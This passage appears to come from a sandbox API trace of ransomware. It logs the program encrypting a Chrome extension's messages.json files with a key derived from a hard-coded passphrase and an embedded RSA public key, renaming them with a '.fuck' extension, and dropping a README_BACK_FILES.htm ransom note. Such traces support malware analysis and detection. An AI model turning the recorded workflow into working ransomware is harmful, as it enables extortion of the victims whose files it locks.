nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.663] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.663] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.664] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.664] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.664] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.664] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.664] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.664] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.664] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.664] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.664] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.664] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.664] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.664] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.664] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.664] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.664] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.664] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.665] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.665] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.665] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.665] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.665] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.665] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.665] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.665] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.665] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.665] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x79, lpOverlapped=0x0) returned 1 [0262.665] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x79, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x80) returned 1 [0262.665] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.665] CloseHandle (hObject=0x5d60) returned 1 [0262.665] CloseHandle (hObject=0x5d5c) returned 1 [0262.665] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json"), bFailIfExists=0) returned 1 [0262.668] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json", dwFileAttributes=0x0) returned 1 [0262.669] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.gsg")) returned 1 [0262.670] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.fuck")) returned 1 [0262.671] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0262.671] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0262.671] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.671] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0262.671] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0262.671] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\readme_back_files.htm")) returned 0xffffffff [0262.671] AreFileApisANSI () returned 1 [0262.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0262.671] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.672] GetFileType (hFile=0x5d64) returned 0x1 [0262.672] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0262.673] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.673] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0262.673] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.673] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.673] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.673] GetLastError () returned 0x0 [0262.673] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json")) returned 0x20 [0262.674] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json", dwFileAttributes=0x80) returned 1 [0262.674] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.675] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.676] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.676] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0262.678] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0262.678] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0262.678] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.678] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0262.678] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.678] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0262.678] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e73240) returned 1 [0262.678] CryptImportPublicKeyInfo (in: hCryptProv=0x2e73240, dwCertEncodingType=0x1, pInfo=0x2ead690*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2ead6c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2ead6c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e4c0) returned 1 [0262.678] CryptEncrypt (in: hKey=0x2e7e4c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0262.679] CryptEncrypt (in: hKey=0x2e7e4c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e73460*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e73460*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0262.679] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e73460*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e73460*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.679] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.685] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.685] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.690] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.690] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.690] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.690] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.690] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.691] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.691] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.691] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.691] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.691] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.691] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.691] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.691] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.691] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.691] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.691] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.691] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.691] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.691] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.691] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.691] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.692] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.692] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.692] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.692] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.692] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 